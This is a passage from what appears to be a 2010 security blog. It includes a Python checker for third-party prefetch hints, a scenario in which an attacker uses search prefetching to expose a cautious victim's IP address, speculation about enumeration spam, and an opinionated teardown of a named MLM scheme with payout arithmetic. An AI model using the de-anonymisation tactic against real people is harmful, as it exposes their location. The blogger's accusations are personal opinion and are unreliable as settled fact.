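        self.page_host = (urlsplit(page_url).hostname or "").lower()
        self.hints = []

    def handle_starttag(self, tag, attrs):
        if tag != "link":
            return
        a = {k: (v or "") for k, v in attrs}
        rels = set(a.get("rel", "").lower().split()) & PREFETCH_RELS
        if not rels or not a.get("href"):
            return
        url = urljoin(self.page_url, a["href"])  # resolves /path and //host/path
        host = (urlsplit(url).hostname or "").lower()
        self.hints.append({
            "rel": " ".join(sorted(rels)),
            "url": url,
            "third_party": host != self.page_host,  # the case the post worries about
        })


def find_prefetch_hints(page_url: str, html: str) -> list:
    parser = PrefetchHintParser(page_url)
    parser.feed(html)
    parser.close()
    return parser.hints


def third_party_prefetch_hosts(page_url: str, html: str) -> list:
    """Hosts that would learn the visitor's IP address without any click."""
    hints = find_prefetch_hints(page_url, html)
    return sorted({urlsplit(h["url"]).hostname for h in hints if h["third_party"]})


# Constructed sample: a results page that hints at two off-site hosts.
SAMPLE_PAGE = """<html><head>
<link rel="stylesheet" href="/style.css">
<link rel="prefetch" href="/results?page=2">
<link rel="next" href="https://spamvertised.example/landing.html">
<link rel="dns-prefetch" href="//tracker.example">
</head><body><a href="https://spamvertised.example/">result</a></body></html>"""

if __name__ == "__main__":
    for hint in find_prefetch_hints("https://search.example/q?x=1", SAMPLE_PAGE):
        print(hint)
    print(third_party_prefetch_hosts("https://search.example/q?x=1", SAMPLE_PAGE))
```

Run it over a saved copy of any page (a search results page included) and the third-party list is exactly the set of servers that will see your address the moment the page renders, which is the scenario described below and the reason the preference is worth switching off.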

So why is it so dangerous? Have there been any cases of malware using link prefetching to spread? Not that I know of.. although it might be theoretically possible. The danger is that you have just revealed your IP address without knowing it..

Let's look at a particular scenario where this can be used. Let's say the attacker is targeting a victim who is using an unidentifiable email address, and the attacker wants to find that victim's IP to tie them down to a location or organisation. In this scenario, the victim is not stupid.. they don't click on links in spam, they don't reply to untrusted messages, never send read receipts and they don't load external images in their mail client.. but the attacker uses social engineering to send an email with details that the victim might Google (for example a telephone number). The victim may then search for references on Google and, even without clicking on anything, the prefetch may reveal their IP address.

Alternatively, prefetch could be used to download illegal content onto a target machine without the victim knowing about it, or there are probably several other ways in which it can be abused.

So it's hard to tell if the original spam was a Joe Job, or someone using prefetch to collect IP addresses for evil purposes. But I'll bloody well keep the prefetch switched off in future..

Sunday, 19 September 2010

"hello / how are you?" mystery spam

I'm probably not alone in receiving a shedload of spam with the subject "hello" and the only content of "how are you?" A quick look at my spam filters shows hundreds of these with a small number getting through, presumably because filters are having a hard time blocking on this little data.

It's hard to be sure exactly what it is, but it reminds me of the mystery "podmena traffica test" spam from last year, which appeared to be a wide-scale enumeration of which mail systems allowed spoofing and which blocked it. So, this could well be something similar.. an enumeration attempt to see which mailboxes DON'T reject a tiny, simple message like this, with the data then used to target those mailboxes in future.

"OK", you may be asking.. "why would you do that if you have the almost unlimited computing power of a botnet at your hands? Why would you need to be selective in your spamming when it doesn't cost you anything?"

One good reason to attack only valid mailboxes with spam and not go for a scattergun "directory harvesting" attack is that mail spam filters specifically look for directory harvesting attacks and then block them and use the data to identify the characteristics of the spam attack. By acting more stealthily, it might be possible to avoid detection for longer and get a higher deliverability rate for spam.

Well, that's a theory anyway.. the best that I can come up with. Any ideas?

Added: here's another idea - the spammer could be looking for vulnerable mail servers to exploit later, so this is a data collection phase to be followed by something evil. Or it could just be a weird prank, of course.

Friday, 17 September 2010

Networking4Africa.com - scam, spam or Joe Job?

Update: networking4africa.com's response is at the bottom of this post

One of the more interesting things that popped into my spam filter today was this.. at first glance it appears to be some sort of MLM scam spam:
From: steve@networking4.africa.com
Reply-To: steve@networking4.africa.com
Date: 17 September 2010 10:41
Subject: WOW 6 grand a month from your home

STOP!!! what your doing...do you know 3 people that have  $15.00?

And do those people know 3 people that have $15.00?

and what about those people and the ones after that? Join Me With 3 subscribers

and when each subscriber does the same through 10 levels

your income would be $63,982.50 per month

http://www.networking4africa.com

Join Now Pay Nothing Until  September 1st.

just get in now before we open to the public.

What if you just did 10% of that.
could you use and extra $6300.00 a month?****
all that for $15.00....
WoW that's the power of People Knowing People, Knowing People Knowing People....

www.networking4africa.com

Steven McGregor Owner and Ceo of www.Networking4africa.com and www.networking4afica.net
[personal address redacted]
+27.[personal number redacted]

Chat with me on face book http://www.facebook.com/smcgregor3

www.networking4africa.com

Please Note You will get Very rich with This program

So wtf is this? It looks like it is promoting a site called networking4africa.com (and networking4africa.net) which does exist (but more of that in a moment). But there are a couple of anomalies where the domain is quoted wrongly (networking4.africa.com in the From and Reply-To addresses, and networking4afica.net in the signature).. kind of odd for a promotional message. Oh, and September 1st is long gone..

Another odd thing is the inclusion of a telephone number and full postal address, because be in no doubt that this email is spam. Typically we see this sort of thing when a Joe Job is in progress.. in other words, the spam is being sent maliciously by a third party and the telephone number is included to cause harassment for the victim.

The email originates from 216.59.18.30, which is a dedicated server at some outfit called WebExxpurts who are assigned 216.59.18.0/24. A look around the netblock shows something interesting though: a site called iunmetered.com a few IPs away at 216.59.18.10, which is an anonymous VPN service. Given that the originating IP for the spam is a dedicated server (which appears to have no active web sites), there's a fair possibility that someone is using iunmetered.com to mask their IP address. But why mask your IP address if you are including a telephone number? It seems bizarre, and again perhaps evidence that "Steven McGregor" did not send the email.

Networking4Africa.com itself is hosted on 12.201.193.120 (a completely different network from the email sender), and the WHOIS details do largely match the ones in the spam, but that proves nothing. But now the plot thickens..

12.201.193.120 is in an IP address range which is allocated to "TEK CHANNEL CONSULTING LLC DBA WHOLSALE BANDWITH" (sic). Tek Channel / Wholesale Bandwidth are a very well known spam-friendly firm that has a ROKSO file at Spamhaus. This range has then been reassigned again to Global Virtual Opportunities Inc of Schert, Texas. This range forms part of AS46549 which has been fingered by Google as being pretty evil:

What happened when Google visited sites hosted on this network?

    Of the 2755 site(s) we tested on this network over the past 90 days, 371 site(s), including, for example, dontforward.com/, helpfulbackpaintips.com/, ultimatesneakers.com/, served content that resulted in malicious software being downloaded and installed without user consent.

    The last time Google tested a site on this network was on 2010-09-17, and the last time suspicious content was found was on 2010-09-16.

Has this network hosted sites acting as intermediaries for further malware distribution?

    Over the past 90 days, we found 16 site(s) on this network, including, for example, latenightwarriors.com/, tricitieslifeinsurance.com/, networkonlinereviews.com/, that appeared to function as intermediaries for the infection of 67 other site(s) including, for example, ccll-gtyarmouth.co.uk/, rogersvillelifeinsurance.com/, mediascout.kr/.

Has this network hosted sites that have distributed malware?

    Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found 16 site(s), including, for example, aardvarkville.com/, extraganancias.com/, latenightwarriors.com/, that infected 253 other site(s), including, for example, meb.gov.tr/, anakku.com/, tottochan.jp/.


In other words, this doesn't look like the sort of place a legitimate web site would want to be hosted.

But then what about networking4africa.com itself? Does it tally with the ridiculous "get rich quick" scheme outlined in the email?

It turns out that the site offers an MLM program which gives part of its proceeds to charity. Now, I've never come across any MLM program that is not some sort of scam.. either an out-and-out Ponzi or something that simply fails to deliver what it seems to be promising.

The basic deal is that you join up for $15 of which $5 goes into a fund called the "Helping Portion" which is meant to eventually help children in Africa. What you get for this is unclear, but on the "Products" page are a couple of eBooks (you know the sort of thing). The idea is that if you sign up enough people then you can make a shedload of cash, and some of this will go to the "helping portion".

It gives an example that if 88,572 people joined, then it would generate $442,860.00 a month for these good causes. But then if 88,572 people simply ponied up $5 a month to Oxfam or a similar charity then it would also generate $442,860.00 a month without participating in some crappy MLM scheme.

And yes.. it is a crappy MLM scheme that is little other than a pyramid scam, according to its own description:

Commissions are paid through a simple unlimited width, 10 level matrix.

This means that you can introduce as many Subscribers as you want and they will appear on your level 1. The subscribers that they refer will be on your level 2 and so on.

You will receive commissions at the following rates for each level:
Level 1 - $2.00
Level 2 - $0.75
Level 3 - $0.75
Level 4 - $0.50
Level 5 - $0.50
Level 6 - $0.50
Level 7 - $0.50
Level 8 - $0.50
Level 9 - $0.75
Level 10 - $0.75

As an example, if you were to only introduce 3 Subscribers and each Subscriber did the same through 10 levels, your income would be $63,982.50 per month. Results will vary from person to person but with a deep matrix your income can be very stable and with unlimited width your potential income is unlimited. 

That's 1 - 3 - 9 - 27 - 81 - 243 - 729 - 2187 - 6561 - 19683 - 59049. Having difficulty visualising that? Well, it looks like this:

..wait, isn't that one of these..?

..yup, it looks like a Pyramid to me.
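Working the site's own numbers through, as an added example (not the site's or the post's code): the commission table and the $15 subscription with its $5 "Helping Portion" are the figures quoted above; everything else is arithmetic on them, done in cents so nothing rounds, and generalised to any recruiting width rather than just the "3 subscribers" case.

```python
"""Income and recruit count in an 'unlimited width, 10 level' matrix.
Added example; the commission rates, the $15 subscription and the $5 helping
portion are the figures quoted on the page, everything else is derived."""
COMMISSION_CENTS = [200, 75, 75, 50, 50, 50, 50, 50, 75, 75]  # levels 1..10
SUBSCRIPTION_CENTS = 1500
HELPING_CENTS = 500


def matrix_payout(width: int, commissions=COMMISSION_CENTS):
    """For one member whose whole downline recruits `width` people each:
    return (recruits_needed, monthly_income_cents, [(level, people, cents)])."""
    recruits, income, per_level = 0, 0, []
    for level, rate in enumerate(commissions, start=1):
        people = width ** level          # level k holds width^k people
        recruits += people
        income += people * rate
        per_level.append((level, people, people * rate))
    return recruits, income, per_level


def money_flows(width: int) -> dict:
    """Where the downline's subscriptions go each month, in cents."""
    recruits, income, _ = matrix_payout(width)
    paid_in = recruits * SUBSCRIPTION_CENTS
    return {
        "recruits": recruits,
        "paid_in": paid_in,
        "to_top_member": income,
        "helping_portion": recruits * HELPING_CENTS,
        "top_share_percent": round(100 * income / paid_in, 1),
    }


if __name__ == "__main__":
    for width in (2, 3, 5):
        flows = money_flows(width)
        print(f"width {width}: {flows['recruits']:,} recruits, "
              f"${flows['to_top_member'] / 100:,.2f}/month to the top "
              f"({flows['top_share_percent']}% of ${flows['paid_in'] / 100:,.2f} paid in)")
```

With width 3 the ten levels hold 88,572 people paying $1,328,580 a month between them, of which the member at the top receives the advertised $63,982.50 (under 5%). The same numbers show why nobody further down can expect the same: each of those 88,572 would need another 88,572 beneath them.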

Now, I don't know South African law and I have absolutely no idea as to the legality of this scheme.. but legal or not, it is certainly bullshit, and dangling the carrot of starving African children is nothing short of despicable.

Which brings us full circle to the spam email.. it does bear all the hallmarks of a Joe Job, but the target site is a stain on the Internet anyway..

Update: Steven McGregor emailed me to say:

I apologise for the spam e-mail that you received. We have been under attack by a spammer based in the Philippines who has been trying to shut us down, but I believe that we have put a stop to it now.
Just a couple of points:

    * The email address that you show in the article does not exist and never has.
    * If you look at the full header of the e-mail you will notice that it did not originate from our domain or IP.
    * We have authentication protection so if you contact our provider they will verify the above.
    * If it was a marketing e-mail there would have been a referral link.
    * If I was going to spam I would not include my personal contact details.



[...] We have had everything that we are doing confirmed by an actuary and I don't really care to go into details. The site and our actions cover this sufficiently.[...] Network Marketing is a completely legal business model and not a pyramid scheme.